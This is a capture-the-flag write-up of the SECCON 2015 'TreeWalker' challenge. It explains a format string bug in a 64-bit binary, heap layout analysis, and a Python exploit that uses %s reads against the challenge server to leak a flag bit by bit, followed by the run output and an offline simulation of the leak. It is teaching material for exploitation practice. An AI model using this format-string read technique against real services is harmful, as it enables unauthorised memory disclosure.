FSB: TreeWalker - SECCON 2015 Online CTF
FSB: TreeWalker
Exploit 200 points - SECCON 2015 Online CTF
you0708@YOKARO-MON
treewalker.pwn.seccon.jp 20000
Surface Analysis
• ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
• Arch: amd64-64-little
• RELRO: No RELRO
• Stack: No canary found
• NX: NX enabled
• PIE: No PIE
• FORTIFY: Enabled
Dynamic Analysis
# ./treewalker
0000000000c69010                    <- Address?
ABCDEFGHIJKLMN
vulnserver.c(77): Invalid input
# IJKLMN
bash: IJKLMN: command not found
#
Only 8 bytes ("ABCDEFGH") were read; the rest of the line ("IJKLMN") was left on stdin and picked up by the shell after the program exited.
Static Analysis
• Main function
Is the address printed by the program related to the flag?
Static Analysis
• construct_tree
Each node built by construct_tree is a leaf of three 8-byte fields: a flag (0x49 or 0x4C) followed by two child slots, each holding either 0 or the address of the next leaf. The recoverable part of the slide diagram:
  Leaf (Flag = 0x49): slot 0 = 0,     slot 1 = Child
  Leaf (Flag = 0x49): slot 0 = Child, slot 1 = 0
  Leaf (Flag = 0x4C): slot 0 = 0,     slot 1 = 0
The two edges leaving a node are labelled 0 and 1; which slot holds the child pointer is what distinguishes them.
![Page 8: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/8.jpg)
Static Analysis
• construct_tree
[Diagram: the full tree built by construct_tree. Leaves are linked by edges labelled 0/1, the path is marked "F", and the chain terminates at a leaf marked "End" (the node with Flag = 0x4C).]
![Page 9: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/9.jpg)
Static Analysis
• Main function
1. The first 8 bytes of the input data are the "size"
2. The input data is then shown via ___printf_chk
___printf_chk is the _FORTIFY_SOURCE wrapper (hence "FORTIFY: Enabled" in the surface analysis). It aborts on %n when the format string lives in writable memory and rejects positional arguments that skip a parameter, so this format string bug gives reads (%x, %s) but not the classic %n write.
![Page 10: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/10.jpg)
Static Analysis
Sending a size of 0x0000000000000004 followed by "hoge": the program echoes "hoge", prints the flag address, and loops back to read the next input.
![Page 11: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/11.jpg)
Vulnerability
• FSB = Format String Bug
After sending "%08x" * 30:
0000000000602010
00000078 f7b175c0 00000b40 ffffcff0 00000000 00000078 cccccccc ... cccccccc (23 words) 78383025
The last value, 78383025, is the bytes "%08x" read little-endian: the input buffer itself is on the stack within reach of the format string, so an address placed in the buffer can be dereferenced with %s.
![Page 12: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/12.jpg)
Exploit
![Page 13: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/13.jpg)
Understanding Heap Layout
• Heap chunks: each leaf is one malloc chunk
  - chunk size + PREV_INUSE flag (the chunk header)
  - Flag = 0x49 (or 0x4C for the end node)
  - 0 or address of child (two slots)
![Page 14: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/14.jpg)
Information Leakage
• Using the format string bug
Two %s reads per leaf are enough, starting from the given address:
  - given address      : 0x49 or 0x4C (the flag byte)
  - given address + 8  : zero or not (the first child slot)
The next leaf follows at +0x18 (size of leaf) + 0x08 (size of chunk header) = +0x20, so the walk continues at the given address + 0x20, + 0x40, and so on. Each leaf yields one flag bit (non-zero slot = 1, zero slot = 0); a flag byte of 0x4C ends the walk.
Caveat: %s stops at the first NUL byte, so "zero or not" really tests the low byte of the slot. That is fine here because the leaves sit at 0x602010 + 0x20·n, whose low byte is never 0x00; on a different heap layout a child pointer ending in 0x00 would read as an empty slot.
![Page 15: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/15.jpg)
exploit.py (Python 2; the socket setup, pQ and read_until helpers are not shown on the slide and are filled in here)
```python
import socket
import struct

def pQ(x):
    # pack a 64-bit little-endian value
    return struct.pack('<Q', x)

def read_until(f, delim):
    # read from the socket file object until delim is seen; returns the data
    # *before* delim, so no slicing is needed afterwards (assumed helper)
    data = ''
    while not data.endswith(delim):
        c = f.read(1)
        if not c:
            raise EOFError('connection closed')
        data += c
    return data[:-len(delim)]

s = socket.create_connection(('treewalker.pwn.seccon.jp', 20000))
f = s.makefile('rw', 0)   # unbuffered file object over the socket

# the server first prints the address of the root leaf (e.g. 0000000000602010)
addr = int(read_until(f, '\n').strip(), 16)
print("[*] addr: %016x" % addr)

flag = ""
flag_next = ""
while flag_next != "L":
    c = 0
    for i in range(8):
        c = c << 1
        buf = '%08x' * 32          # walk up the stack to where the input buffer lies
        buf += ' !%s! '            # %s -> string at addr      (flag byte: 'I' or 'L')
        buf += ' !%s! '            # %s -> string at addr + 8  (first child slot; empty if 0)
        buf += pQ(addr)
        buf += pQ(addr + 8)
        f.write(pQ(len(buf)) + buf)   # first 8 bytes of the input are the size
        read_until(f, ' !')
        flag_next = read_until(f, '! ')
        read_until(f, ' !')
        child = read_until(f, '! ')
        if flag_next == 'L':
            break                  # end node reached
        if child:
            bit = 1
        else:
            bit = 0
        print bit,
        c += bit
        addr += 0x20               # next leaf: 0x18 leaf + 0x08 chunk header
    else:
        # only runs when all 8 bits were read (no break)
        print ""
        flag += chr(c)
print("[*] flag: %s" % flag)
```
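To see the leaf encoding and the leak oracle together without the network, here is an added example that is not part of the original slides. It builds a chain of leaves in a constructed heap image using the layout the heap-layout and information-leakage slides describe (0x20 stride, flag qword at +0, child slots at +8 and +16), emulates what `%s` returns for an address (bytes up to the first NUL), and runs the same walk as exploit.py against it. The heap base 0x602010 and the bit convention (non-zero first slot = 1) come from the slides; the encoder direction and the `nul_safe` check are my reconstruction, added to show the NUL-byte pitfall of a `%s` oracle on a layout where it bites.

```python
import struct

NODE_STRIDE = 0x20   # 0x18 leaf + 0x08 chunk header (heap-layout slide)
LEAF_SIZE = 0x18
FLAG_INNER = 0x49    # 'I'
FLAG_END = 0x4C      # 'L'


def build_heap(secret, base=0x602010):
    """Constructed heap image: a chain of leaves encoding `secret` MSB-first.

    Leaf n lives at base + n*NODE_STRIDE as [flag][slot0][slot1] (qwords).
    Bit 1 puts the pointer to leaf n+1 in slot0 (addr+8), bit 0 in slot1,
    matching the exploit's "child at addr+8 non-zero" test.
    Returns {leaf address: raw bytes}.
    """
    bits = [(ch >> i) & 1 for ch in secret.encode() for i in range(7, -1, -1)]
    heap = {}
    for n, bit in enumerate(bits):
        here = base + n * NODE_STRIDE
        nxt = here + NODE_STRIDE
        slot0, slot1 = (nxt, 0) if bit == 1 else (0, nxt)
        heap[here] = struct.pack('<QQQ', FLAG_INNER, slot0, slot1)
    heap[base + len(bits) * NODE_STRIDE] = struct.pack('<QQQ', FLAG_END, 0, 0)
    return heap


def leak_s(heap, addr):
    """Emulates a '%s' read of `addr`: the bytes up to the first NUL."""
    for start, data in heap.items():
        if start <= addr < start + LEAF_SIZE:
            return data[addr - start:].split(b'\x00', 1)[0]
    raise ValueError('unmapped address 0x%x' % addr)


def walk(leak, addr):
    """The exploit.py loop, parameterised by a leak oracle (addr -> bytes)."""
    flag = b''
    while True:
        c = 0
        for _ in range(8):
            c <<= 1
            flag_byte = leak(addr)
            child = leak(addr + 8)
            if flag_byte == b'L':
                return flag.decode()
            c += 1 if child else 0
            addr += NODE_STRIDE
        flag += bytes([c])


def nul_safe(heap):
    """Leaf addresses (other than the root) whose low byte is 0x00.

    A child pointer to such a leaf is stored little-endian, so '%s' on the
    slot prints nothing and the walk misreads that bit as 0.
    """
    root = min(heap)
    return [a for a in sorted(heap) if a != root and (a & 0xff) == 0]


# Heap image for the real flag at the address the challenge printed.
HEAP = build_heap('SECCON{4rb17R@rYReAd}', base=0x602010)

# Same secret on a base that puts a leaf at ...00: the oracle silently fails.
BAD_HEAP = build_heap('A', base=0x602000)

if __name__ == '__main__':
    print('[*] recovered:', walk(lambda a: leak_s(HEAP, a), 0x602010))
    print('[*] unsafe leaves:', [hex(a) for a in nul_safe(BAD_HEAP)])
    print('[*] misread:', walk(lambda a: leak_s(BAD_HEAP, a), 0x602000))
```

On the challenge layout the walk reproduces the flag; on the shifted base the leaf at 0x602100 is pointed to by a slot whose first byte is 0x00, so `%s` returns an empty string and the last bit of 'A' (0x41) is lost, decoding as '@' (0x40). Checking `nul_safe` before trusting an `%s`-based oracle is the practical takeaway.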
![Page 16: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/16.jpg)
$ python exploit.py
[*] addr: 0000000000602010
0 1 0 1 0 0 1 1
0 1 0 0 0 1 0 1
0 1 0 0 0 0 1 1
0 1 0 0 0 0 1 1
0 1 0 0 1 1 1 1
0 1 0 0 1 1 1 0
0 1 1 1 1 0 1 1
0 0 1 1 0 1 0 0
0 1 1 1 0 0 1 0
0 1 1 0 0 0 1 0
0 0 1 1 0 0 0 1
0 0 1 1 0 1 1 1
0 1 0 1 0 0 1 0
0 1 0 0 0 0 0 0
0 1 1 1 0 0 1 0
0 1 0 1 1 0 0 1
0 1 0 1 0 0 1 0
0 1 1 0 0 1 0 1
0 1 0 0 0 0 0 1
0 1 1 0 0 1 0 0
0 1 1 1 1 1 0 1
[*] flag: SECCON{4rb17R@rYReAd}
Thank you!